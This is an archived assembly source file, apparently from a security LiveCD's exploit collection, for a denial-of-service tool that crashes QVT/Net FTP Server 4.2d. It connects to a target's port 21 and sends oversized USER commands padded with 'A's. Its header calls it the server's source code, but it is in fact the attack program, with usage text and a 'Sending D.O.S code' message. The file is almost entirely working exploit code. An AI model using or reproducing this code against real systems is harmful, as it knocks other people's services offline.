home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / tftp / qvtftp42 / MY.ASM.txt < prev   
Text File  |  2005-02-12  |  9KB  |  276 lines
  1. ;============================================================================
  2. ; This is the source code for QVT/Net FTP Server version 4.2d win98/NT     ==
  3. ;                                                                          ==
  4. ; Source by: USSR Labs                                                     ==
  5. ; www.ussrback.com                                                         ==
  6. ;                                                                          ==
  7. ;============================================================================
  8.  
  9. .386p
  10. locals
  11. jumps
  12. .model flat, stdcall
  13.  
  14. extrn   GetCommandLineA:PROC
  15. extrn   GetStdHandle:PROC
  16. extrn   WriteConsoleA:PROC
  17. extrn   ExitProcess:PROC
  18. extrn   WSAStartup:PROC
  19. extrn   connect:PROC
  20. extrn   send:PROC
  21. extrn   recv:PROC
  22. extrn   WSACleanup:PROC
  23. extrn   htons:PROC
  24. extrn   socket:PROC
  25. extrn   inet_addr:PROC
  26. extrn   closesocket:PROC
  27. Extrn    GetModuleHandleA          : PROC
  28. Extrn    GetProcAddress              : PROC
  29. Extrn    lstrlenA              : PROC
  30.  
  31. .data
  32.  
  33.  
  34. sploit_code label byte
  35.         DB 'USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  36.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  37.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  38.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  39.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  40.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  41.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  42.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  43.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  44.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  45.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  46.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  47.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  48.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  49.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  50.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  51.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  52.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  53.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  54.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  55.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  56.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  57.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  58.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA',13,10
  59.  
  60. sploit_code_length   equ     $-sploit_code
  61.  
  62. sploit_code2 label byte
  63.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  64.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  65.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  66.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  67.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  68.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  69.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  70.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  71.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  72.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  73.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  74.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  75.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  76.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  77.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  78.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  79.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  80.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  81.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  82.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  83.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  84.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
  85.         DB 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA',13,10
  86.  
  87. sploit2_code_length   equ     $-sploit_code2
  88.  
  89. Copy            db "QVT/Net FTP Server version 4.2d Win98/NT Denial of Service", 13, 10
  90.                 db "by: Ussr",13,10
  91.                 db "for source code or binary go to: http://www.ussrback.com/qvtfs42/",13,10,13,10
  92.                 db "Usage: dieqvtftp HostIp", 13, 10
  93.                 db "Example: dieqvtftp 205.488.47.6",13,10,0
  94. Copyl        equ $-Copy
  95.  
  96. wsadescription_len equ 256
  97. wsasys_status_len equ 128
  98.  
  99. WSAdata struct
  100. wVersion dw ?
  101. wHighVersion dw ?
  102. szDescription db wsadescription_len+1 dup (?)
  103. szSystemStatus db wsasys_status_len+1 dup (?)
  104. iMaxSockets dw ?
  105. iMaxUdpDg dw ?
  106. lpVendorInfo dw ?
  107. WSAdata ends
  108.  
  109. sockaddr_in struct
  110. sin_family dw ?
  111. sin_port dw ?
  112. sin_addr dd ?
  113. sin_zero db 8 dup (0)
  114. sockaddr_in ends
  115.  
  116. wsadata WSAdata
  117. sin sockaddr_in
  118. sock dd ?
  119. numbase dd 10
  120. hostParamether db 256 dup (?)
  121. buffer dd 1000 dup (0)
  122. buffer2 dd 1000 dup (0)
  123. buffer3 dd 1000 dup (0)
  124.  
  125. i_cant_connect    db 'fata: sorry i can',27h,'t connect to this host!',13,10
  126. i_cant_connectl equ $-i_cant_connect
  127.  
  128. SendingExploit  db 'Sending D.O.S code....',13,10
  129. SendingExploitl equ $-SendingExploit
  130.  
  131. include code.inc
  132.  
  133. cchWritten dd 0
  134. ConHandle dd 0
  135.  
  136. .code
  137. start:
  138.     xor    eax,eax
  139.     xor    ebx,ebx
  140.     xor    edx,edx
  141.     xor    ecx,ecx
  142.     xor    esi,esi
  143.     xor    edi,edi
  144.     xor    ebp,ebp
  145.     Push    -11
  146.     Call    GetStdHandle
  147.     Mov    [ConHandle],EAX
  148.     call    GetCommandLineA
  149.     mov    edi, eax
  150.     mov    ecx, -1
  151.     xor    al, al
  152.     push    edi
  153.     repnz    scasb
  154.     not    ecx
  155.     pop    edi
  156.     mov    al, 20h
  157.     repnz    scasb
  158.     dec    ecx
  159.     mov    esi, edi
  160.     cmp    byte ptr [esi],0
  161.     je    no_command_line
  162.     cmp    byte ptr [esi],20
  163.     je    incrementa1
  164. continue:
  165.         lea     edi, hostParamether
  166.     rep    movsb
  167.     push    offset wsadata
  168.     push    0101h
  169.     call    WSAStartup
  170.     xor    eax, eax
  171.     push    eax
  172.     inc    eax
  173.     push    eax
  174.     inc    eax
  175.     push    eax
  176.     call    socket
  177.     mov    sock, eax
  178.     mov    sin.sin_family, 2
  179.         mov     eax,21d                         ; port
  180.     push    eax
  181.     call    htons
  182.  
  183.     mov    sin.sin_port, ax
  184.         push    offset hostParamether
  185.     call    inet_addr
  186.  
  187.     mov    sin.sin_addr, eax
  188.     push    size sin
  189.     push    offset sin
  190.     push    sock
  191.     call    connect
  192.     or    eax, eax
  193.     jz    connectionworking
  194.     Write_Console <offset i_cant_connect > <i_cant_connectl >
  195.     jmp    the_end
  196. incrementa1:
  197.     inc   si
  198.     jmp   continue
  199. connectionworking:
  200.     xor    eax, eax
  201.     push    eax
  202.     push    1000
  203.     push    offset buffer
  204.     push    sock
  205.     call    recv
  206.         push    offset buffer
  207.     call    lstrlenA
  208.     Write_Console <offset buffer  > <eax >
  209.         Write_Console <offset SendingExploit > <SendingExploitl >
  210.     call    lstrlenA
  211.         xor     eax, eax
  212.     push    eax
  213.     push    sploit_code_length
  214.     push    offset sploit_code
  215.     push    sock
  216.     call    send
  217.         xor     eax, eax
  218.         push    eax
  219.         push    1000
  220.         push    offset buffer2
  221.         push    sock
  222.         call    recv
  223.         push    offset buffer2
  224.         call    lstrlenA
  225.         Write_Console <offset buffer2 > <eax >
  226.         xor     eax, eax
  227.     push    eax
  228.         push    sploit2_code_length
  229.         push    offset sploit_code2
  230.     push    sock
  231.     call    send
  232.         Write_Console <offset SendingExploit > <SendingExploitl >
  233.  
  234.         push    sock
  235.     call    closesocket
  236.     call    WSACleanup
  237.  
  238.     push    offset wsadata
  239.     push    0101h
  240.     call    WSAStartup
  241.  
  242.     xor    eax, eax
  243.     push    eax
  244.     inc    eax
  245.     push    eax
  246.     inc    eax
  247.     push    eax
  248.     call    socket
  249.     mov    sock, eax
  250.     mov    sin.sin_family, 2
  251.         mov     eax,21d                         ; port
  252.     push    eax
  253.     call    htons
  254.  
  255.     mov    sin.sin_port, ax
  256.         push    offset hostParamether
  257.     call    inet_addr
  258.  
  259.         push    size sin
  260.     push    offset sin
  261.     push    sock
  262.     call    connect
  263.  
  264. the_end:
  265.     push    sock
  266.     call    closesocket
  267.     call    WSACleanup
  268. final_exit:
  269.     push    0
  270.     call    ExitProcess
  271. no_command_line:
  272.     Write_Console <offset Copy > <Copyl >
  273.     jmp   final_exit
  274. end start
  275.  
  276.